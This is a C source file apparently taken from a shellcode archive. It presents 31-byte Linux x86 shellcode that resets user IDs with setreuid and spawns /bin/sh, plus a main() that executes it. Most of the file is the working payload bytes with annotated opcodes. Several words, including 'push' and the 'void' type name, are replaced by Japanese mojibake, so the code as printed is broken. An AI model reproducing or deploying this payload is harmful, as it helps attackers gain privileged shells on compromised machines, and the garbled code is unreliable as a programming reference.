/* 31 byte setreuid() shellcode - # man ±Æ¤ò¤Ä¤¯¤ë¡¿Èø¹Ô¤¹¤ë
* os: Slackware 9.1, Phlak 2.4, Knoppix 0.1
*
* www.manshadow.org
* r-22@manshadow.org
* irc.efnet.ÂáÊ᤹¤ë #_man_shadow
*/

char shellcode[] =
"\x31\xC9"              /* xor ecx,ecx     */
"\x31\xDB"              /* xor ebx,ebx     */
"\x6A\x46"              /* ²¡¤·¿Ê¤á¤ë byte 70    */
"\x58"                  /* pop eax         */
"\xCD\x80"              /* int 80h         */
"\x51"                  /* ²¡¤·¿Ê¤á¤ë ecx        */
"\x68\x2F\x2F\x73\x68"  /* ²¡¤·¿Ê¤á¤ë 0x68732F2F */
"\x68\x2F\x62\x69\x6E"  /* ²¡¤·¿Ê¤á¤ë 0x6E69622F */
"\x89\xE3"              /* mov ebx,esp     */
"\x51"                  /* ²¡¤·¿Ê¤á¤ë ecx        */
"\x53"                  /* ²¡¤·¿Ê¤á¤ë ebx        */
"\x89\xE1"              /* mov ecx,esp     */
"\x99"                  /* cdq             */
"\xB0\x0B"              /* mov al,11       */
"\xCD\x80";             /* int 80h         */

int main(int argc, char *argv[]) {
       ̵¸ú¤Î (*sc)() = (̵¸ú¤Î *)shellcode;
       printf("len:%d\n", strlen(shellcode));
       sc();
       return 0;
}